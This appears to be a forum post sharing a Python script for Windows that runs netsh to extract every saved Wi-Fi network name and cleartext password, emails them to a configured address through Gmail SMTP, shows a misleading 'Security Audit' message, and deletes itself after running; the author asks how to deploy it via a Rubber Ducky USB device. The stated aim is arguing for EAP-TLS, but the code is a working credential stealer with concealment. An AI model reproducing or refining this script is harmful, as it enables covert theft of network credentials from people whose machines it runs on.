So I wanted to convince an enterprise of the importance of EAP-TLS for enterprise wireless access points that support sensitive systems. I'm sure many of you have come across companies that use username and password for their companies access points.
I'm fairly new at writing python scripts so please bare with. Credit goes out to youtube channel "pytutorials" for the wifi_passwords function.
# Tested on Windows 10 - with McAfee AntiVirus
# Runs a subprocess - netsh and identifies SSID names and Passwords
# Packages the findings and sends wireless SSIDs and Credentials to an email
# Requirements
## Sender Gmail Email Address
## Sender Gmail API Key
## Email address of the person receiving the SSID names and Credentials
How can we package this into a Rubber Ducky?
#!/usr/bin/env python
import subprocess
import tempfile
import time
import smtplib
from email.mime.text import MIMEText
from os import remove
from sys import argv
print('Security Audit will take one minute')
# from_address = Senders email address
from_address = 'who_it_is_from_email_address_here'
# to_address = Receivers email address
to_address = 'receiver_email_address_here'
# api_key = Gmail API key
api_key = 'who_it_is_from_gmail_api_key_here'
#Create a temporary file to write SSID and wifi_passwords
fp = tempfile.TemporaryFile(mode='w+t')
def wifi_passwords():
"This writes to tempfile SSID and Password"
a = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i]
for i in a:
results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
try:
fp.write(str("{:<30}| {:<}\n".format(i, results[0])))
except IndexError:
fp.write(str("{:<30}| {:<}\n".format(i, "")))
except KeyboardInterrupt:
print("User stopped program!")
fp.seek(0)
def send_message():
"Sends an email with SSIDs and Creds"
msg = MIMEText(fp.read())
msg['From'] = from_address
msg['To'] = to_address
msg['Subject'] = 'SSIDs and Creds'
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(user=msg['From'], password=api_key)
server.send_message(msg)
server.quit()
wifi_passwords()
send_message()
fp.close()
# Below self destructs the python script when executed
remove(argv[0])